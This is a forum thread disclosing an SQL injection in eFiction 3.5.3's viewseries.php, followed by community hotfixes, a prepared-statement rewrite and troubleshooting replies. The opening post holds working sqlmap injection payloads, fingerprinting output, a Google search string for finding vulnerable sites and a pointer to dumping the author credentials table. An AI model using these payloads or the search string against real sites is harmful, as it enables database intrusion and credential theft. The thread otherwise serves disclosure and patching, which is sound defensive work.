[Sticky] SQL Injection vulnerability in eFiction

Page 1 / 2
Anonymous
(@Anonymous)
Guest

Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

    $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

    $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
    ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

    sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
    ---
    Place: GET
    Parameter: seriesid
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

        Type: error-based
        Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
        Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
    ---
    [2041] [INFO] testing MySQL
    [2042] [INFO] confirming MySQL
    [2045] [INFO] the back-end DBMS is MySQL
    [2045] [INFO] fetching banner
    [2045] [INFO] retrieving the length of query output
    [2045] [INFO] retrieved: 20
    [2025] [INFO] retrieved: 5.1.69-community-log
    [2025] [INFO] actively fingerprinting MySQL
    [2028] [INFO] executing MySQL comment injection fingerprint
    web application technology: Apache, PHP 5.2.17
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
              banner parsing fingerprint: MySQL 5.1.69, logging enabled
    banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

    inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

... Robert

Posted : 12/11/2014 7:46 pm
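The following is an added example, not code from the post or from eFiction itself. It rebuilds the string concatenation used in viewseries.php 3.5.3 and feeds it a legitimate id plus two of the sqlmap payloads quoted above, so the reader can see the statement MySQL actually receives without touching a database. The TABLEPREFIX value is an assumption.

```php
<?php
// Added example (not eFiction code): reproduces the query construction in
// viewseries.php 3.5.3 so the effect of the sqlmap payloads can be read off
// without a database. TABLEPREFIX is assumed.
define('TABLEPREFIX', 'fanfic_');

// Same construction as the vulnerable line in viewseries.php: the raw GET
// value is dropped between single quotes with no escaping and no type check.
function build_vulnerable_query($seriesid) {
    return "SELECT s.title, s.seriesid FROM " . TABLEPREFIX . "fanfiction_inseries as i, "
         . TABLEPREFIX . "fanfiction_series as s WHERE s.seriesid = i.seriesid"
         . " AND i.subseriesid = '$seriesid'";
}

// A legitimate id plus two of the sqlmap payloads quoted in the post
// (URL-decoded form, as PHP sees them in $_GET).
$inputs = array(
    'legitimate'    => '1',
    'boolean-blind' => "1' AND 9530=9530 AND 'xaMV'='xaMV",
    'time-blind'    => "1' AND SLEEP(5) AND 'hXxL'='hXxL",
);

foreach ($inputs as $label => $value) {
    echo "[$label]\n" . build_vulnerable_query($value) . "\n\n";
}
```

For the boolean-blind input the WHERE clause ends as `i.subseriesid = '1' AND 9530=9530 AND 'xaMV'='xaMV'`: the leading `1'` closes the quote the application opened, and the trailing `'xaMV'='xaMV` consumes the closing quote the application appends, so the statement stays syntactically valid. When the injected comparison is true the page renders the same as for id 1; when it is false it does not, which gives sqlmap one bit per request. `SLEEP(5)` provides the same oracle through response time when there is no visible difference in the page. The error-based payload in the post relies on MySQL's duplicate-key error from the `FLOOR(RAND(0)*2)` GROUP BY trick and only yields data when database errors are echoed back to the client.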
Sheepcontrol
(@sheepcontrol)
Reputable Member

YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  return $dbconnect->real_escape_string($str);
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  if (!is_array($str)) return $dbconnect->real_escape_string($str);
  return array_map('escapestring', $str);
}

(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
  if(version_compare(phpversion(),"4.3.0")=="-1") {
    $str = mysql_escape_string($str);
  } else {
    $str = mysql_real_escape_string($str);
  }
  return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
  if (!is_array($str)) return mysql_real_escape_string($str);
  else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, that would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:

include(_BASEDIR."includes/pagesetup.php");


$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is. That has to do with the fact that I am not really into the 3.5.3 code; I merely took the project over with the intention of bringing it to version 5.0.0, which is underway but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.

Posted : 13/11/2014 4:31 am
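The following is an added example, not the hotfix from the post above and not eFiction's own code. It shows the approach a practitioner would prefer over escaping a value into the SQL text: validate seriesid as a positive integer and bind it to a mysqli prepared statement, so the id never becomes part of the statement. TABLEPREFIX, the connection details and the request handling at the bottom are assumptions; the code is written to run on PHP 5.2 as well as current PHP.

```php
<?php
// Added example (not eFiction code): a hardened replacement for the seriesid
// handling in viewseries.php, using strict integer validation and a mysqli
// prepared statement. TABLEPREFIX and the connection details are assumed.
define('TABLEPREFIX', 'fanfic_');

// Accept only a positive integer id. Returns false for anything else,
// including arrays (?seriesid[]=1) and values that is_numeric() would still
// accept, such as "1.5" or "1e3".
function parse_series_id($raw) {
    if (!is_string($raw)) {
        return false;
    }
    return filter_var($raw, FILTER_VALIDATE_INT,
                      array('options' => array('min_range' => 1)));
}

// Run the parent-series lookup with a bound parameter. The id is sent to
// MySQL separately from the statement text, so no quoting trick can change
// the query, and escapestring() is no longer needed for this value.
function fetch_parent_series(mysqli $db, $seriesid) {
    $sql = "SELECT s.title, s.seriesid FROM " . TABLEPREFIX . "fanfiction_inseries AS i, "
         . TABLEPREFIX . "fanfiction_series AS s"
         . " WHERE s.seriesid = i.seriesid AND i.subseriesid = ?";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $seriesid);
    $stmt->execute();
    // bind_result() works without mysqlnd, unlike get_result(), so it is
    // usable on the PHP 5.2 installs reported in the thread.
    $stmt->bind_result($title, $parentId);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('title' => $title, 'seriesid' => $parentId);
    }
    $stmt->close();
    return $rows;
}

// Usage in the place of the original assignment in viewseries.php.
$seriesid = isset($_GET['seriesid']) ? parse_series_id($_GET['seriesid']) : false;
if ($seriesid === false) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid seriesid');
}
$db = new mysqli('localhost', 'efiction', 'secret', 'efiction'); // assumed credentials
$parents = fetch_parent_series($db, $seriesid);
// $seriesid is now a PHP integer, so reusing it later to build links is safe too.
```

The `is_numeric()` plus `escapestring()` combination in the hotfix does close the hole for this query, because the value sits inside single quotes and is escaped, but it still depends on the quoting context being correct everywhere the value is used. A validated integer bound through a prepared statement does not depend on that, and it also removes the reflected, unescaped value that the later test in this thread reports in the generated links.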
Sheepcontrol
(@sheepcontrol)
Reputable Member

Ran a test: because $seriesid is used directly to build links, it still shows up as injected, but the actual DB query is safe.

Posted : 13/11/2014 6:31 am
kaehana
(@kaehana)
New Member

I did this change, but now when I click the submit button everything is OK; but when I want to echo the inserted text, it shows "rn" between the lines (in the database it shows rn). I tried to remove these tags but they don't disappear. How could I remove these tags?

Posted : 13/11/2014 7:51 am
Purpleyin
(@purpleyin)
Active Member

> (You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
> Step 2:
> Open includes/mysqli_functions.php, find at or around line 56:
>
> // Used to escape text being put into the database.
> function escapestring($str) {
>   if(version_compare(phpversion(),"4.3.0")=="-1") {
>     $str = mysql_escape_string($str);
>   } else {
>     $str = mysql_real_escape_string($str);
>   }
>   return $str;
> }
>
> Modify to:
>
> // Used to escape text being put into the database.
> function escapestring($str) {
>   if (!is_array($str)) return mysql_real_escape_string($str);
>   else return array_map('escapestring', $str);
> }
>
> This will no longer probe for PHP versions before 4.3.0, but honestly, that would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Posted : 13/11/2014 7:54 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

> I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks

Posted : 13/11/2014 8:25 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

> I did this change, but now when I click the submit button everything is OK; but when I want to echo the inserted text, it shows "rn" between the lines (in the database it shows rn). I tried to remove these tags but they don't disappear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Posted : 13/11/2014 8:26 am
kaehana
(@kaehana)
New Member

> Holy Batman, fired a bit too far here ^^
>
> I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now its ok

Posted : 13/11/2014 9:10 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

Thanks for the feedback, good to know.

Posted : 13/11/2014 9:27 am
darklight
(@darklight)
Estimable Member

Thank you for getting on this so quick!

Posted : 13/11/2014 10:39 am
kaehana
(@kaehana)
New Member

Series doesn't show with

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get error in line 39 viewseries.php.

But its ok if I use:

$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I don't know if it is ok to use this last code.

Posted : 13/11/2014 10:53 am
Sheepcontrol
(@sheepcontrol)
Reputable Member

> Series doesn't show with
>
> $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;
>
> I get error in line 39 viewseries.php.
>
> But its ok if I use:
>
> $seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
>
> I don't know if it is ok to use this last code.

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.

Posted : 13/11/2014 11:08 am
Sue
(@sue)
Estimable Member

Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.

Posted : 13/11/2014 2:48 pm
Charl
(@charl)
Active Member

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

Posted : 13/11/2014 5:05 pm
Sheepcontrol
(@sheepcontrol)
Reputable Member

> A quick search didn't find those lines of code in the files. There was similar code but not the same.
>
> Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if your files did indeed differ, that's strange.
Anyway, I couldn't sleep, so I made the hotfix, a full package including a few other fixes that came up; within the next days I've got family festivities coming my way.

Posted : 13/11/2014 8:54 pm